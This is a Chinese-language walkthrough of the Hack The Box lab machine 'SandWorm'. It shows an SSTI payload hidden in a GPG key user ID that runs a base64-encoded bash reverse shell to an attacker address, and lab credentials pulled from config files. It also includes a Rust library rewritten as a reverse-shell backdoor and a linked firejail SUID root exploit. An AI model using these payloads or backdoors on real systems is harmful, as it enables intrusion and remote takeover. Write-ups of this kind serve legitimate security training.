2023年6月18日 10:10:16
Nmap
┌──(root💀kali)-[~]
└─# nmap -A 10.10.11.218 130 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 22:09 EDT
Nmap scan report for 10.10.11.218
Host is up (0.32s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after: 2050-09-19T18:03:25
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
开了22,80,443端口
image.png
ssa.htb
该网站是利用非对称加密算法技术来对内容进行加解密运算
运用的加密技术就是PGP 主要用于邮件加密方向的技术
image.png
原理就是:
Encrypt
- 在加密的时候,先生成一个(随机的)对称密钥,TlakvAQkCu2u,通过这个对称密码对data进行加密
- 然后发送者通过接受者的公钥把这个随机生成的对称密钥进行加密,然后把经过对称密钥加密的Data和经过接受者公钥加密的对称密钥一起发送
Decrypt
- 先把Data和对称加密的密钥分离出来,此时这两个类型的数据都是加密的
- 接受者通过自己的私钥先把对称密钥(q4fzNeBCRSyqv)解密得到TlakvAQkCu2u
- 再使用对称密钥(TlakvAQkCu2u)对Data进行解密
解密内容
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt
nihao123;whaomi;#
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# gpg --encrypt --recipient-file id_rsa.pub message.txt
File 'message.txt.gpg' exists. Overwrite? (y/N) y
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt
nihao123;whaomi;#
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
└─# cat message.txt.gpg | base64
hQIMA2u3M9ko0UzmAQ/+JxrwZH9aQaGjlJwO1Nv4k07oOq9Q8wgVScwXhVzgjeXnwC+/NX7caz3P
P1ygbXNBsAbKykLMJG+EzjWmsG5fwnC8EqjK1fwtkNjERCwwA91s/OdoT788g8G1RzWFhi++JzWC
bRuCokTb81ju7blnyJT/EhawTK/CcGUEhyEmGnQhmvKByWhQH1F3KJNPgHsvLkaXyNU/mXvXRyeU
ljVAG5TaFL/yJPfoRGlXsBGfDXilsAk28IpM/dddkdLtgPzwoSLwc9B9mZgYuC67POFryDA4GmSW
9qMo2P5SsNse1JXLExQPkaGbXrI1GTQFMZbpwHsTAS3riwaCEX8QipC2R4Z4j526/a15Bqkl10v3
KEDB6wPDbPaT1/8yzb9OSssDy+RR1FDK8hK1eq84KmCXfB9NiVIBkdHrDycDni+LXPwZfytc6kja
F7FseL0YgJBm5ou8r6SEvYMVkYyvANhziJLMt2Yc3XXKkiOIv6+ycmEGHwVC3qO0DJocGyzLSTy/
a+sZyHxWi26ep5JYFokCRKx+SWSb/0ICkOPuMoulR8lGUSxEFtDlbuiPSXdTvc6eWPitoZa9qeIv
+xr//HFfB4JduiL0Rh3OqYJbmTU4oSZY7eTtSRnnD4ifKATazhxQwgkzPAiRBf+CDz2iCPThT7YO
g1pkyG+10AVIQ6V0UQzSVwHFSXE/VUvur4u8j/WHIVk1MeE1nQ9t8sKvZZzCkWQxvGIYik2ZEUla
tsVPsjytAoFvqR6hMqg/w3RyDLAgbdQX/t/u6JCC6GQYRthCiyfMtlB5PQKeGQ==
┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/SandWorm]
image.png
通过这个网站对加密的内容进行url编码
image.png
验证签名
image.png
image.png
验证签名成功
Signature is valid!
[GNUPG:] NEWSIG gpg: Signature made Thu 04 May 2023 04:13:47 PM UTC gpg: using RSA key D6BA9423021A0839CCC6F3C8C61D429110B625D4
[GNUPG:] KEY_CONSIDERED D6BA9423021A0839CCC6F3C8C61D429110B625D4 0
[GNUPG:] SIG_ID CsBPTL20G6/YKI6iNhSErGIXx5U 2023-05-04 1683216827
[GNUPG:] KEY_CONSIDERED D6BA9423021A0839CCC6F3C8C61D429110B625D4 0
[GNUPG:] GOODSIG C61D429110B625D4 SSA (Official PGP Key of the Secret Spy Agency.) gpg: Good signature from "SSA (Official PGP Key of the Secret Spy Agency.) " [ultimate]
[GNUPG:] VALIDSIG D6BA9423021A0839CCC6F3C8C61D429110B625D4 2023-05-04 1683216827 0 4 0 1 8 01 D6BA9423021A0839CCC6F3C8C61D429110B625D4
[GNUPG:] TRUST_ULTIMATE 0 pgp
发现这里验证签名会验证信息,网站本身是flask 搭建的,想办法看看哪里可以ssti注入
网站的公私钥是使用gpg命令来实现的,我们看看常见的命令
以下是 gpg 常见命令及其说明:
gpg --gen-key: 生成一个新的密钥对,包括公钥和私钥。在生成过程中,您将需要输入名称、电子邮件地址和选定的密码等信息。
gpg --list-keys: 列出所有已经生成的公钥。
gpg --import <filename>: 导入公钥或者私钥文件。
gpg --armor --export <email>: 导出指定邮箱的公钥,并把结果输出为 ASCII 编码的格式。
gpg --encrypt --recipient <recipient-email> <filename>:使用指定接收者的公钥来加密文件,使其只能被其对应的私钥持有者解密。
gpg --decrypt <filename>: 解密文件,前提是使用者必须拥有相应的私钥才行。
gpg --verify <filename>: 验证签名文件是否和原始文件匹配。
这些是最常用的 GPG 命令,但不止于此,GPG 还有许多其他命令。建议查看 GPG 的官方文档以获得更详细的信息。
以下是和签名有关系的常见 GPG 命令及其说明:
gpg --sign <filename>: 对文件进行数字签名。默认使用用户的默认密钥对进行签名,也可以指定其他密钥。
gpg --clearsign <filename>: 对文件进行清晰签名。这种签名方式不会对整个文件进行加密,而是将签名附加到文件末尾,易于阅读。
gpg --verify <signed-filename>: 验证数字签名是否有效,并检查签名是否由信任的密钥持有者创建。
gpg --detach-sign <filename>: 生成一个独立的签名文件,而不是将签名附加到文件中。这种签名方式通常用于对二进制文件进行签名。
gpg --clearsign <filename>: 对文本文件进行清晰签名。它会将签名附加到文件底部,方便人类阅读。
这些是和签名相关的一些常见 GPG 命令,但还有许多其他命令。建议查看 GPG 的官方文档以获得更详细的信息。
生成自己的公私钥信息以及签名信息
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
GnuPG needs to construct a user ID to identify your key.
Real name: {{1*7}}@qq.com
Email address: {{1*7}}@qq.com
You selected this USER-ID:
"{{1*7}}@qq.com <{{1*7}}@qq.com>"
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/root/.gnupg/openpgp-revocs.d/7DEF520F8486A158CEFE281E3EF0D0B3755A0252.rev'
public and secret key created and signed.
pub rsa3072 2023-06-20 [SC] [expires: 2025-06-19]
7DEF520F8486A158CEFE281E3EF0D0B3755A0252
uid {{1*7}}@qq.com <{{1*7}}@qq.com>
sub rsa3072 2023-06-20 [E] [expires: 2025-06-19]
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --list-key
gpg: checking the trustdb
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: next trustdb check due at 2025-06-19
/root/.gnupg/pubring.kbx
------------------------
pub rsa3072 2023-06-20 [SC] [expires: 2025-06-19]
7DEF520F8486A158CEFE281E3EF0D0B3755A0252
uid [ultimate] {{1*7}}@qq.com <{{1*7}}@qq.com>
sub rsa3072 2023-06-20 [E] [expires: 2025-06-19]
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# echo test > msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
myNm8HZYYVAsuR1Od5o5c4NyAKILTg0=
=uSFb
-----END PGP PUBLIC KEY BLOCK-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com > publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --clear-sign msg
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# ls
msg msg.asc publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat msg.asc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
test
-----BEGIN PGP SIGNATURE-----
iQGzBAEBCgAdFiEEfe9SD4SGoVjO/igePvDQs3VaAlIFAmSRsZEACgkQPvDQs3Va
AlLDewwAzeKPNfT9nZrggzP9uJcyDcd1aMRoespprYTKq3d8NfS3CCfAdrN3vkCb
BdBkCCeTjeJ1ket39EKRk3kJZ+zWrWgYFVPmHGan4MiVLY+41ecQ+jlnYaviNVAj
E6C54sD7AsLtRRDEmeRLkA0GNo2/Zxy6wSr9HY71p6XM+dl0r+eDUNSjwj+uKRHX
UktBB/xUdglLeBdp/+y8RSGkOmiIUS3KBBc3qzid+OYUqUeT+sVPln2FL03RQ6h2
VOwoRBpgtOMmKQXnE1ndLS0NdAXeG5tVBM+I6BVjsHhsGlL9iVz9TPK9wuz4L4nN
w538BFrIzYdnZ2EeaAbgSMdZM9FsVH36r3ezh42E9GAF08tdogiRrJrRGf3aHIwS
dIw3hbL2skcDwi/qIkm5ed77RKouLmb1qFS8o1gNci+lYQMIyrUdI9ChqaV9Sq+Z
MTOFOfbPTsOQRf0iyUESCFUovzUH93q1rTU3Y8yvvAhnMxrIuMzj0kgXY2WTUBjQ
/qRE4kXr
=SXBu
-----END PGP SIGNATURE-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─#
image.png
分别把刚才的公钥和签名放到相应的位置
image.png
发现这里对我们的 7进行了解析说明这里可以进行ssti注入
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --edit-key {{1*7}}@qq.com 130 ⨯
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Secret key is available.
sec rsa3072/3EF0D0B3755A0252
created: 2023-06-20 expires: 2025-06-19 usage: SC
trust: ultimate validity: ultimate
ssb rsa3072/572C2905CEB9039C
created: 2023-06-20 expires: 2025-06-19 usage: E
[ultimate] (1) {{1*7}}@qq.com <{{1*7}}@qq.com>
gpg> adduid
Real name: {{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }}
Email address: someb0dy@htb.com
Comment:
You selected this USER-ID:
"{{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }} <someb0dy@htb.com>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
sec rsa3072/3EF0D0B3755A0252
created: 2023-06-20 expires: 2025-06-19 usage: SC
trust: ultimate validity: ultimate
ssb rsa3072/572C2905CEB9039C
created: 2023-06-20 expires: 2025-06-19 usage: E
[ultimate] (1) {{1*7}}@qq.com <{{1*7}}@qq.com>
[ unknown] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQ0NDQgMD4mMQo=|base64 -d|bash").read() }} <someb0dy@htb.com>
gpg> save
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --clear-sign msg
File 'msg.asc' exists. Overwrite? (y/N) y
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# gpg --armor --export {{1*7}}@qq.com > publicKey
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat msg.asc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
test
-----BEGIN PGP SIGNATURE-----
iQGzBAEBCgAdFiEEfe9SD4SGoVjO/igePvDQs3VaAlIFAmSRudoACgkQPvDQs3Va
AlJblwv/ZTAXFH+eDDv9zuasML0Gkjv1PgLJuPVz49NVq13mv93Ql0jvEQTS0jyA
z3bMfkxQT7/fM+6qEyJ8OIHrfOC/NFQj1WuLWJ45VadIjsz2ZeVmeLYZvAY5izV5
54H7WuO9+qr1bnX04NuwqHbqoU+qMYKQACW462vNO7N4siJuFTEex9DeQPqCLudy
mnZ/6OsZniNApRqW9dbw/RwGnbJpE9WdSJ3N5KpL/ZNTVKTIG80wUSOPGEtkd9O0
eslPZNk4MfYim2q8sGG3/F5xTk2u+B0+/CVNr76jphOzhwauoXOka4WV4yCOKfS5
ZhuuklzXbUQ9sgHCDTQFTfXUg1Mhd16K7DdiCf+BHAZDMJk+oXfPqgKPGXPUjvpl
l7fqHnToR43qZOoryAhXslu0qZmjvGmyqYRzG52DCeTTjQp5l6BPlokE321T9+9y
8Do6/+1aADfdEj26EaUyCEnIG1NKVs9a3Avwhupn0O8ywpGEx7yT690jX7XyIGUh
bc1jOEPD
=j2Zl
-----END PGP SIGNATURE-----
┌──(root💀kali)-[/home/…/hacktheboxtools/machine/SandWorm/sign]
└─# cat publicKey
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBGSRsVABDADPg1tNfZ73JoEo06M3vPrcUMhAjYfe6Rup16w9NWH4WjWmmVkJ
FsCnNvl/uEAEhaYpNHBaiuvc0H3nVV9GYkd0SHF9uxeNHdEn6HgG/76KHM3Ht/3Y
WFRlbx98mHcrJdJakhNhvWWE6SUtzvnp2zFanDfWDks1GIEMB9KGkf66AZE9qWcv
PmogyZsSRTAHcg0Gper0uDoVmrR+zX1NI53gaGzB1JOcPrYKAForn5Dmd1eQScA7
PKorW1Z4FaEuCEFYQOsN8LmruvUl04LTvFv4crDbfWhhF7RQ0aQbQd4LZJPndBf4
jbq33eTjIFXIbxnxez8XcGnNyhnm2p6s1FAe4kpC9qYBxYTWY2no1mkV90W3hXuf
3yWAxAdTn4mxlfiR128CvBVG7sXCYgGORajyKy5Y7kGSQds+S9zst1XN9twrfy37
varDzuLOZ1aB6Qqt8qqTINLDEeUlpy7B8aTiLPkk4ZbJrbDoGcbO+gXYm9kpEIR3
/fD8slb3o6hVMO8AEQEAAbQfe3sxKjd9fUBxcS5jb20gPHt7MSo3fX1AcXEuY29t
PokB1AQTAQoAPhYhBH3vUg+EhqFYzv4oHj7w0LN1WgJSBQJkkbFQAhsDBQkDwmcA
BQsJCAcCBhUKCQgLAgQWAgMBAh4BAheAAAoJED7w0LN1WgJS2lIMALBz4V3ixkIR
xYZY37LyEHCcIR4IIkBpAJvFPDkY4E+NP1l8HpBOO1dHegKKmU+RPtHywsjTPdkx
bjq/Q11Jr3G8fz3DPBSOG9iNutCN/LghhtuUPa7KIRxgjDjEU1sg/zYVSxQkOmKD
irpN39VL8pFabPRogsaM4VfrN+pobL9mYp/yfqagj65aG5SDJq4jxY8yAIOTk31N
W9z16aCW6xb2N7nc9MFVwPFxZmFQt69J7dNrSA2mDQadRJPJiZk8DCBP75vCMQIf
1+eurg87eGcIDEVtvyj+ye625V0k5td6x8IYF0d9l98/0eg1gETPnCKNzWxfpVDN
ow9rAc/zsClQIMHQruCvwezWPsxrtYkVqvwDg2+FZoNrelz2pz5Ke/FpjW68Us0x
NbvUx9uzuHcnjRo1em5IClJhLnrv7En4mqnGezaB3agnkfIEE5TfBNvOFrOjAM0s
GXgQAdzaLsAa+p+DxplBZmv6Up/OYW1m6phrZvVM4hOrDtMBtProxrSte3sgc2Vs
Zi5fX2luaXRfXy5fX2dsb2JhbHNfXy5fX2J1aWx0aW5zX18uX19pbXBvcnRfXygn
b3MnKS5wb3BlbigiZWNobyBZbUZ6YUNBdGFTQStKaUF2WkdWMkwzUmpjQzh4TUM0
eE1DNHhOaTQyTHpRME5EUWdNRDRtTVFvPXxiYXNlNjQgLWR8YmFzaCIpLnJlYWQo
KSB9fSA8c29tZWIwZHlAaHRiLmNvbT6JAdQEEwEKAD4WIQR971IPhIahWM7+KB4+
8NCzdVoCUgUCZJG51AIbAwUJA8JnAAULCQgHAgYVCgkICwIEFgIDAQIeAQIXgAAK
CRA+8NCzdVoCUiiFC/9KN/l8WzTem/SLdguJPvBkTi7ggZQb3vGu/7thhb00OKtL
Of944tkCj8VNqEkRFiMBMYT7HbZ+2nibA+AXz84eOAchKmXqGK/ahd4tDgIzSg9C
0+tHwg3ebbdh7xFKYC87PLb7nWqmrOp1vF+KAkh57iTIkkc6IBBtyWSEE2TvVCm6
S2hUAyPusLag5xfMHIWUGRL3/hWiucXoXevPbMx1DRZo1+C5xKCHBWVeTg1GmSJN
aG2CVz2hwv2vRbPs3E84d0M+dnZ42+2L6rnCQrzkULKustg2OdjcWb9kymgtmJjr
8O1N0bdOvw1f9onoH1Hl25Kj8nxsfoMysChJbCYZ+yckBhFcrVBxsOAifzYZ7Xm4
ve3OjqOjhcW5J+eR30d4jtxQ4V9XFfQ4pFzt3LJhq5AIAE7iOTCWR1BEah4ILhhf
dg56bnEV2zJoPENUG5HzsWAfl7YP1J0Q/nJ7Mrhf+E7t28lrPV9RvAo/a2Dgwz5V
URn5wtV/ehUGfPMv9BG5AY0EZJGxUAEMAMWpnjKBvUuICk+9Sa+++cuNoPahyuA9
aRdF2ducxu/ws8QZzxRxPjHZSlBvsc1J3DaSUJChiGOlwqOlmbipZwuhfta1I8Il
1cSX8e1eptF8YnsqlRqON/GJZNePPEk+u/oBvqNHX6Af+1mM/6AbiUdzwqGrVUri
LYSavPlZGhE5rEGJPQ64UwwLvRfYXbMdrDpDlblybM9Ws17UjImqFHAiRNQLyKj4
rS230U4CFZcyQXG5Tv0bxZinQOp8luafYT+hSyNq0cqrBLdfxrC9S2gBHMWT6Ky9
YxvZmJAeY4Jc6ZXz0psCxSclyCeS++HcMwGbRyentHHLRKKMN8j8qbY3SZLCRun2
tYYbiEKM2ZDUqeJonVqBP7tOFrRieEIEpsWVLSdtynnILfwVWSalakQ8A2nZXQw5
2Z7sesIRvWfOUeyceXdk2B+8ZAWyYGvsQ1kXgaa4/oe/ZaqxkKhMc/6KrpNYyl6+
nS70s8raJBcfuk/EBS0c2UbhsghNzlWn6wARAQABiQG8BBgBCgAmFiEEfe9SD4SG
oVjO/igePvDQs3VaAlIFAmSRsVACGwwFCQPCZwAACgkQPvDQs3VaAlKdqAv/QRba
difXu4dzA0sXQELbt5va8oO/SMTrgEmCMPDZcrdw7TIC4Bk+zeirgF0GMJruyFhK
aQw5LdncpD4fgdkLKERfDbu/WdzF21Cr4Abb4GveBrWLg9/xc0t9VUaLJ/4rC5Xu
XCUgDc/jf+VrEjO9BJgm4WfHQpI9/aAaEEVsn+YTB5uaEQpn8oOd6EdwH7WaMJIN
GzTv1RgR/vqnaU/RVBmgQsK8YkadKKOAtc+KrAfuJMq17plLigBkTpRlRbQgfffO
nnQjmr1xxs74L7aZvEJTvwFCOov7T5LyDtfrpPXiCNhU28UAz/lmHa9UR5YDbDbc
63azRhUdGo0JUmjLA6nQQ2ykaNIN+yi06YNYneI0L0OxJu27qlzAhgO2bmfr+xqF
LJwUazGBBUI1ZwfljziZ3bi1Ihw0j7MKYkae4PRn25y5cVzak161GcvmvlG36X0p
VEqAhIEbze51irbDS4udKsSyjldUs5sjZvB2WGFQLLkdTneaOXODcgCiC04N
=12ny
-----END PGP PUBLIC KEY BLOCK-----
反弹shell
通过这个方式执行命令进行反弹shell
image.png
image.png
把上面生成的公钥和签名放到这里
shell!!!
atlas@sandworm:/var/www/html/SSA/SSA$ cat __in
cat __init__.py
from flask import Flask
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = '91668c1bc67132e3dcfb5b1a3e0c5c21'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://atlas:GarlicAndOnionZ42@127.0.0.1:3306/SSA'
db.init_app(app)
# blueprint for non-auth parts of app
from .app import main as main_blueprint
app.register_blueprint(main_blueprint)
login_manager = LoginManager()
login_manager.login_view = "main.login"
login_manager.init_app(app)
from .models import User
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
return app
从web根目录的代码中找到了数据库连接密码
| username | passwd |
|---|---|
| atlas | GarlicAndOnionZ42 |
但是没用mysql这个命令- -,估计是在沙箱中好多命令都执行不了
最后翻home目录下面有一个配置文件
/home/atlas/.config/httpie/sessions/localhost_5000
cat admin.json
{
"__meta__": {
"about": "HTTPie session file",
"help": "https://httpie.io/docs#sessions",
"httpie": "2.6.0"
},
"auth": {
"password": "quietLiketheWind22",
"type": null,
"username": "silentobserver"
},
"cookies": {
"session": {
"expires": null,
"path": "/",
"secure": false,
"value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
}
},
"headers": {
"Accept": "application/json, */*;q=0.5"
}
}
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ pwd
pwd
/home/atlas/.config/httpie/sessions/localhost_5000
| username | passwd |
|---|---|
| silentobserver | quietLiketheWind22 |
ssh 连接成功 user flag 成功获取
Root
image.png
image.png
仔细看到应该是有以root权限启动的计划任务
在翻看文件时候/opt/crates/logger/src
extern crate chrono;
use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
pub fn log(user: &str, query: &str, justification: &str) {
let now = Local::now();
let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);
let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
Ok(file) => file,
Err(e) => {
println!("Error opening log file: {}", e);
return;
}
};
if let Err(e) = file.write_all(log_message.as_bytes()) {
println!("Error writing to log file: {}", e);
}
}
这里有一个记录日志文件的rust文件,猜测应该会执行
我们对这个文件具有完全的控制权限修改为反弹shell
RustBackDoor
extern crate chrono;
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};
pub fn log(user: &str, query: &str, justification: &str) {
let sock = TcpStream::connect("<IP attack>:4444").unwrap();
let fd = sock.as_raw_fd();
Command::new("/bin/bash")
.arg("-i")
.stdin(unsafe { Stdio::from_raw_fd(fd) })
.stdout(unsafe { Stdio::from_raw_fd(fd) })
.stderr(unsafe { Stdio::from_raw_fd(fd) })
.spawn()
.unwrap()
.wait()
.unwrap();
}
image.png
修改lib.rs之后稍等一会成功,成功反弹shell,此时的atlas用户是没有沙箱限制的,发现id组多了应该 jailer
image.png
发现firejail 带有suid
提权的过程和之前的Cerberus靶机一样
Refer:https://gist.githubusercontent.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25/raw/86058ce12f69997b2de35c5de7bcd3036654f32f/exploit.py
提权脚本
atlas@sandworm:~/someb0dy$ python3 exploit.py
python3 exploit.py
/home/atlas/someb0dy/exploit.py needs to have the execute bit set for the exploit to work. Run `chmod +x /home/atlas/someb0dy/exploit.py` and try again.
atlas@sandworm:~/someb0dy$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
atlas@sandworm:~/someb0dy$ chmod +x
chmod +x exploit.py
atlas@sandworm:~/someb0dy$ python3 exploit.py
python3 exploit.py
You can now run 'firejail --join=239891' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
ls
ls
然后在反弹一次shell在另一个终端中输入
- firejail –join=239891
- 再接着 su -
atlas@sandworm:/opt/tipnet$ firejail --join=239891
firejail --join=239891
Warning: cleaning all supplementary groups
changing root to /proc/239891/root
Child process initialized in 7.52 ms
su -
id
uid=0(root) gid=0(root) groups=0(root)
